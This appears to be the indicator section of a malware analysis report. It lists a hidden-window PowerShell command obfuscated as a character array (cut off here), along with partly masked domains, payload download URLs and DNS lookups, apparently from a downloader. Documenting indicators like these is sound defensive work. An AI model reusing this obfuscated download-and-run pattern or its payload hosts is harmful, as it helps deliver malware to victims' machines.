Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -joIN ( [ChaR[]]( 24 ,75 , 76,88,1 , 82 ,89 , 75,17, 83,94,86,89,95 , 72,28 ,114 , 89,72 , 18, 107 , 89, 94 ,127 ,80, 85 ,89 ,82, 72, 7,24,127, 75, 70 ,1,27, 84 ,72 , 72 ,76, 6,19 , 19 ,9, 13 ,...
- '51##.top':80
- 'th###yapp.com':80
- 'sh##.69slam.sk':80
- 'tc#####ersecurity.com':80
- http://51##.top/II1S3LEJ/
- http://sh##.69slam.sk/60nDON/
- http://www.tc#####ersecurity.com/H56uKcU/
- DNS ASK 51##.top
- DNS ASK th###yapp.com
- DNS ASK le##eo.se
- DNS ASK sh##.69slam.sk
- DNS ASK tc#####ersecurity.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -joIN ( [ChaR[]]( 24 ,75 , 76,88,1 , 82 ,89 , 75,17, 83,94,86,89,95 , 72,28 ,114 , 89,72 , 18, 107 , 89, 94 ,127 ,80, 85 ,89 ,82, 72, 7,24,127, 75, 70 ,1,27, 84 ,72 , 72 ,76, 6,19 , 19 ,9, 13 ,...' (with hidden window)